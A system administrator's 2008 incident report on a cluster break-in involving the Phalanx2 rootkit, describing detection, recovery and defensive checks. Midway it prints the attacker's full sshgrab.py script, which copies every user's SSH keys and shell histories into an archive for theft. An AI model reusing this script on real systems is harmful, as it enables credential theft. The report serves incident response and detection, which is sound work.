What Happened?

Our systems were broken into sometime on July 24th. I discovered the break-in on the 28th. A few of you have asked me to describe what happened, so the following narrative is the best I can do.

On Monday, July 28th, I checked the administrative mail messages on hep and saw reports of some odd files on a couple of other nodes in the cluster. (I don't remember which nodes, only that they were spread across groups.) The messages showed a directory, /etc/khubd.p2, installed in a few places. At first it looked empty, but then I found some hidden files called .p2rc, .phalanx2 and .sniff. I googled for phalanx2 and found nothing, but the file named .sniff made me leery, so I decided to search all nodes for the /etc/khubd.p2 directory. I found it first on hep:

drwxrwxrwx    2 root     root         4096 Jul 28 14:29 ./
drwxr-xr-x   94 root     root        12288 Jul 28 15:05 ../
-rw-r--r--    1 root     root         1356 Jul 24 19:58 .p2rc
-rwxr-xr-x    1 root     root       561032 Jul 24 19:58 .phalanx2*
-rwxr-xr-x    1 root     root         7637 Jul 28 15:04 .sniff*
-rw-r--r--    1 root     53746        1063 Jul 24 20:56 sshgrab.py
This made me very nervous. Something strange was happening, and we had probably been broken into. I started looking at the running processes and noticed a telnet session open to lx2.hep.uiuc.edu. This seemed odd, and when I asked the user who owned the process, he knew nothing about it. I killed the telnet session and started looking for other odd things. When I came back to the .sniff file, I realized that its size had changed, so some running process was writing to it. The normal command to use here would be lsof. I ran lsof .sniff and got nothing, which was very weird. I then looked through all the running processes for anything unusual, but found nothing.

A fellow admin took a closer look at the sshgrab.py file and noted that it basically dumps each user's .ssh directory (along with shell history files) to /dev/shm. He also pointed out that we should be able to kill whatever process was running by rebooting the computer, which sounded like a good idea. The phantom process was also running on cdf46, so I decided to reboot that computer. Unfortunately, when it came back up, the .sniff file was still growing. I now knew for sure that I needed to reinstall the OS, but I wanted to see if I could figure out how this happened in the first place.

The timestamps on the directories and files were July 24th around 8pm. I looked at who was logged in during that time and didn't see anything unusual. I also didn't see anything very strange in the logs, though I only gave them a quick look. The admin messages showing the directory didn't arrive until Saturday, so the program "might" not have been running until Saturday, but I'm not positive of that. Saturday's messages, which I didn't read until Monday, were the first clue I had that something was wrong. Either way, I haven't been able to figure out how this happened and probably never will. I did replace the system disk on hep, so I still have the original disk as it appeared on Monday afternoon.

A more thorough examination of the files led to a user who has not been logging in much. Looking more closely at that account, we noticed that the .ssh/known_hosts and .ssh/authorized_keys files had changed at the time of the break-in. We tracked the user down to ask if (s)he had logged in during that time, and (s)he had not. So it looks like the original break-in was due to a compromised password. The key added to authorized_keys did not have a host attached to it, but it's shown here:

ssh-dss AAAAB3NzaC1kc3MAAACBAKn4aRh3dDdiVMbJ/Q4bZzbqZIVNM+JZXAFv2IemCzXmfOhQxu9ZKqJUMw+CD3ilyXizQwQdf6PGyKrNrNJ5MGmjlN9r9dBD6tl8llkNn5UqxoDzqHPENvheLPOlbNqJ1Wvf/2gMk3udsMsBDp2JQX1lgSAMNFkaPRBXY1AuA4uNAAAAFQDyoi0J5TjS+2V6Lk6+Yme72v01YwAAAIAi+D3SSFn+8TKhGS8xCz+kL3lRm3qTKwPwlWKPyw1htPi5O9WciIqZITbyg3MW39J6s6wDeXE1CjFKWsqb5BIG7KW2QsZkCHgP8u1R8jltzyrUwK1xo9TBm8ntwkIJrZpSn/dtflX66q0/kC+nlKosixuXrCA87GHADzOnnjNFXAAAAIA6rn+mRBULCtsT65hy1ZjZ2s7islO0FTOSTBhHj+OCyi/Rtj6qc4c2zRyb7kx4zD692MjBukcGVV9fcHirxuHQGklhqZZ06iivhkEYstQCPUnIQSLpIlVlIA56gfuwdvdKwliboYsFsM/Vg5PAbotoI2gJi9e3EcC3HMIFxITd7Q==
And the only change in known_hosts was for the node bonner-pcs2.rice.edu.
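The check described above, looking for files that changed around the time of the break-in, can be sketched in Python. This is only an illustration, not the procedure I actually followed: the function name files_modified_between and the three-hour window are assumptions, and modification times can be forged by anyone with root, so an empty result proves nothing. It is best run against a disk mounted on a known-clean system, since a kernel rootkit can hide files from a live scan.

```python
import os
from datetime import datetime


def files_modified_between(root, start, end):
    """Return sorted (path, mtime) pairs for files under root with start <= mtime <= end."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                # lstat so that symlinks are reported themselves, not followed
                mtime = datetime.fromtimestamp(os.lstat(path).st_mtime)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if start <= mtime <= end:
                hits.append((path, mtime))
    return sorted(hits)
```

For example, calling files_modified_between("/home", datetime(2008, 7, 24, 19, 0), datetime(2008, 7, 24, 22, 0)) and keeping only the paths that contain "/.ssh/" would list the known_hosts and authorized_keys files touched in that (hypothetical) window.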

At this time, I wanted to get started reinstalling computers to minimize our downtime. I first reinstalled hep, then tux and finally kenny. This meant that all the users' home directories were mounted and available to sendmail. I then set up all the users' accounts and immediately disabled them all. We were receiving mail fine, but no one was able to read it at this point. I also renamed each user's .ssh directory to .ssh.DONOTUSE. There's a very good chance that keys were copied, and I want to make sure everyone knows that.

Since then, I've set up sendmail, dovecot (IMAP server) and squirrelmail (webmail) to allow users to read and send mail. As I was reinstalling hep, I upgraded to RHEL5, as this seemed as good a time as any to do so. One problem I had was that pine would not install. Some of you will have noticed that we now have alpine instead of pine. I've heard that some keyboard shortcuts don't work properly in alpine and that it's very slow to save messages. When I get some more time, I'll see about getting a different version of alpine or just a plain version of pine.

If you have any problems or notice anything on hep that isn't quite right, please let me know. I may not get to it right away, but in my haste I probably missed installing or configuring some important items.

I am now hanging around in my office waiting for users to drop by to get their new passwords. I've also been reinstalling other nodes that showed traces of the keystroke logger.

One thing to note: the .sniff file was found on all the computers that were reinstalled; however, it was empty on a number of them. So I'm guessing that the keystroke logger never ran on those. As an example, I checked the .sniff file on hepblog and it was empty. I know that the picosecond blog, which is hosted on this computer, has been updated since the 24th, so I'm fairly certain that the program was only capturing things typed into a terminal or ssh window. It was not copying any keystrokes that came through a browser. I also tried this for myself on hepelog. I watched the .sniff file while I wrote some text into a new log entry. Nothing appeared in the .sniff file.
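Watching the .sniff file for growth, as described above, can be approximated with a small polling loop. This is a minimal sketch and not the method I used at the time (I just kept listing the file); the function name file_grew and its default interval are assumptions. It only tells you whether bytes were appended while you were watching. It does not identify the writer, which in our case lsof could not find either.

```python
import os
import time


def file_grew(path, interval=5.0, samples=3):
    """Return True if the file's size increases between consecutive samples."""
    last = os.stat(path).st_size
    for _ in range(samples):
        time.sleep(interval)
        size = os.stat(path).st_size
        if size > last:
            return True  # something appended to the file while we waited
        last = size
    return False
```

Calling file_grew("/etc/khubd.p2/.sniff") while typing into a terminal on the same node, and then again while typing into a browser form, would repeat the comparison described in the paragraph above.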

While I was reinstalling, I did a more thorough google search for the .phalanx2 program and found a program called phalanx-b6. I'm fairly certain that this is the rootkit that was installed on our computers. Here is the description:

Phalanx is a self-injecting kernel rootkit designed for the Linux 2.6 branch that does not use the now-disabled 
/dev/kmem device. Features include file hiding, process hiding, socket hiding, a tty sniffer, 
a tty connectback-backdoor, and auto injection on boot.
And, if anyone cares, here is the sshgrab.py program:
#!/usr/bin/python
import os, sys

p = os.popen("getent passwd")

passwd = p.readlines()
p.close()

host = os.uname()[1]

os.system("mkdir /dev/shm/%s;chmod 777 /dev/shm/%s" % (host,host))


for user in [(x.split(":")[0],x.split(":")[-2],x.split(":")[2]) for x in passwd]:
        if os.fork() == 0:
                print "setting uid = %s/%s" % (user[0],user[2])
                os.setuid(int(user[2]))
                try:
                        os.stat("%s/.ssh" % user[1])
                        print "%s/.ssh -> /dev/shm/%s" % (user[1],host)
                        os.system("cp -r %s/.ssh /dev/shm/%s/%s" % (user[1],host,user[0]))
                        for x in ["bash", "sh", "kshrc", "zsh", "mysql"]:
                                os.system("cp %s/.%s_history /dev/shm/%s/%s 2>/dev/null" % (user[1],x,host,user[0]))
                except: pass
                sys.exit(0)
        else:
                os.wait()

os.system("cd /dev/shm;tar -cf %s.tar %s;rm -rf %s;gzip %s.tar;ls -l /dev/shm/%s.tar.gz" % (host,host,host,host,host))

print "done"
I've been in contact with another guy and he gave me the following info:
I was able to get the rootkit to run on one of our test boxes. There
are at least two hints, that there is a running version of this rootkit
on your system:

o There is a hidden process which is neither in the listing of 'ps'
 nor of 'ls /proc'. The process reacts to signals though and its
 directory in /proc can be accessed.

o If the attacker tried to hide in directory '/path' a subdirectory
 '/path/secret' then the link count of '/path' will be too high. e.g.:

 user@linux:/tmp$ ls -al | grep "^d"
 drwxrwxrwt  7 root root 296 2008-08-01 15:05 .
 drwxr-xr-x 32 root root 864 2007-12-23 12:58 ..
 drwxrwxrwt  2 root root  72 2008-07-08 08:23 .font-unix
 drwx------  2 user user  80 2008-07-25 23:16 ssh-eToaww5944
 drwx------  2 user user  80 2008-07-08 08:24 ssh-wMQEEV1371
 drwxrwxrwt  2 root root  72 2008-07-08 08:23 .X11-unix
 user@linux:/tmp$

 The link count should be 6 and not 7. There is a hidden subdir.
He also told me that this break-in appears to have used a newer version of the phalanx toolkit, which is available on packetstorm.
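The two hints in the quoted message can be turned into rough checks. The sketch below is my own illustration, not a tool supplied by the person quoted, and the names excess_links, check_directory and unlisted_pids are made up for it. It assumes a filesystem where a directory's link count is 2 plus its number of subdirectories (true for ext2/ext3, not for every filesystem), and it assumes the hidden process still has a readable /proc/<pid>/status file. A process that starts between the listing and the probe will show up as a false positive, so anything reported should be re-checked by hand.

```python
import os


def excess_links(nlink, visible_subdirs):
    """Link count beyond the conventional 2 + number of subdirectories."""
    return nlink - (2 + visible_subdirs)


def check_directory(path):
    """Return the excess link count for path, or None if it cannot be judged."""
    nlink = os.lstat(path).st_nlink
    if nlink < 2:
        return None  # filesystem does not follow the 2 + subdirs convention
    with os.scandir(path) as entries:
        visible = sum(1 for e in entries if e.is_dir(follow_symlinks=False))
    return excess_links(nlink, visible)


def unlisted_pids(max_pid=32768, proc="/proc"):
    """Return PIDs that are reachable under proc but missing from its listing."""
    listed = {int(name) for name in os.listdir(proc) if name.isdigit()}
    suspects = []
    for pid in range(1, max_pid + 1):
        if pid in listed:
            continue
        try:
            with open("%s/%d/status" % (proc, pid)) as f:
                fields = dict(line.split(":", 1) for line in f if ":" in line)
        except OSError:
            continue  # no such process, or it exited in the meantime
        # Thread IDs are reachable under /proc without being listed, so only
        # report entries that are thread-group leaders (real processes).
        if fields.get("Tgid", "").strip() == str(pid):
            suspects.append(pid)
    return suspects
```

For the /tmp listing in the quoted message, which shows a link count of 7 and four visible subdirectories, excess_links(7, 4) gives 1, matching the one hidden subdirectory he describes.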

Mary Heintz
Updated: 4 August 2008